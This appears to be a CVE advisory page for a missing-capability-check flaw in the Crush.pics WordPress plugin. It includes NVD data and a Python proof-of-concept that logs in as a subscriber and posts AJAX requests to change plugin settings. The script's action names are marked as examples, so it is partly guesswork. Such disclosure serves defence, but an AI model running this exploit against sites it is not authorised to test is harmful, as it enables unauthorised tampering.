Security Vulnerability Report
CVE-2025-14482 CVSS 4.3 MEDIUM

Published: 2026-01-14 06:15:53
Last Modified: 2026-04-15 00:35:42

Description

The Crush.pics Image Optimizer - Image Compression and Optimization plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on multiple functions in all versions up to, and including, 1.8.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify plugin settings including disabling auto-compression and changing image quality settings.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Crush.pics Image Optimizer WordPress plugin <= 1.8.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys

import requests

# CVE-2025-14482 PoC - Missing capability checks (CWE-862) in Crush.pics Plugin
# Target: WordPress site with Crush.pics Image Optimizer <= 1.8.7
# Authentication: Requires any valid user account (Subscriber role or higher)


def exploit_crush_pics(target_url, username, password):
    """
    Exploit missing capability checks in Crush.pics plugin settings modification.
    """
    # Step 1: Authenticate and get valid nonce/cookie
    login_url = f"{target_url}/wp-login.php"
    session = requests.Session()

    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': target_url
    }

    print(f"[*] Authenticating as {username}...")
    response = session.post(login_url, data=login_data, allow_redirects=False)

    # WordPress appends a site hash to the cookie name, so match on the prefix
    cookie_names = session.cookies.get_dict()
    if not any(name.startswith('wordpress_logged_in') for name in cookie_names):
        print("[-] Authentication failed!")
        return False

    print("[+] Authentication successful!")

    # Step 2: Get admin URL to extract nonce (if needed)
    # In some cases, the AJAX endpoint may not require nonce verification

    # Step 3: Exploit - Disable auto-compression
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"

    # Payload 1: Disable auto-compression feature
    disable_auto_data = {
        'action': 'crush_pics_disable_auto',  # Example action name
        'setting': 'auto_compression',
        'value': '0'
    }

    print("[*] Attempting to disable auto-compression...")
    response = session.post(ajax_url, data=disable_auto_data)

    if response.status_code == 200:
        print("[+] Auto-compression disabled successfully!")

    # Payload 2: Modify image quality settings
    quality_data = {
        'action': 'crush_pics_update_quality',  # Example action name
        'quality': '100',  # Set to maximum (no compression)
        'format': 'png'  # Change output format
    }

    print("[*] Attempting to modify image quality settings...")
    response = session.post(ajax_url, data=quality_data)

    if response.status_code == 200:
        print("[+] Image quality settings modified!")

    print("[*] Exploitation complete. Check plugin settings in WordPress admin panel.")
    return True


if __name__ == "__main__":
    # Script name plus three arguments: target URL, username, password
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: python {sys.argv[0]} http://example.com subscriber password123")
        sys.exit(1)

    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]

    exploit_crush_pics(target, user, pwd)
```

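References

https://plugins.trac.wordpress.org/browser/crush-pics/trunk/inc/class-ajax.php#L193
https://plugins.trac.wordpress.org/browser/crush-pics/trunk/inc/class-ajax.php#L30
https://plugins.trac.wordpress.org/browser/crush-pics/trunk/inc/class-ajax.php#L66
https://www.wordfence.com/threat-intel/vulnerabilities/id/5e71bf15-aee0-4efc-a1c6-faad9f6e4f38?source=cve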

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14482", "sourceIdentifier": "[email protected]", "published": "2026-01-14T06:15:52.597", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Crush.pics Image Optimizer - Image Compression and Optimization plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on multiple functions in all versions up to, and including, 1.8.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify plugin settings including disabling auto-compression and changing image quality settings."}, {"lang": "es", "value": "El plugin Crush.pics Image Optimizer - Compresión y Optimización de Imágenes para WordPress es vulnerable a la modificación no autorizada de datos debido a la falta de comprobaciones de capacidad en múltiples funciones en todas las versiones hasta la 1.8.7, inclusive. Esto hace posible que atacantes autenticados, con acceso de nivel Suscriptor y superior, modifiquen la configuración del plugin, incluyendo la desactivación de la autocompresión y el cambio de la configuración de calidad de imagen."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/crush-pics/trunk/inc/class-ajax.php#L193", "source": "[email protected]"}, {"url": 
"https://plugins.trac.wordpress.org/browser/crush-pics/trunk/inc/class-ajax.php#L30", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/crush-pics/trunk/inc/class-ajax.php#L66", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5e71bf15-aee0-4efc-a1c6-faad9f6e4f38?source=cve", "source": "[email protected]"}]}}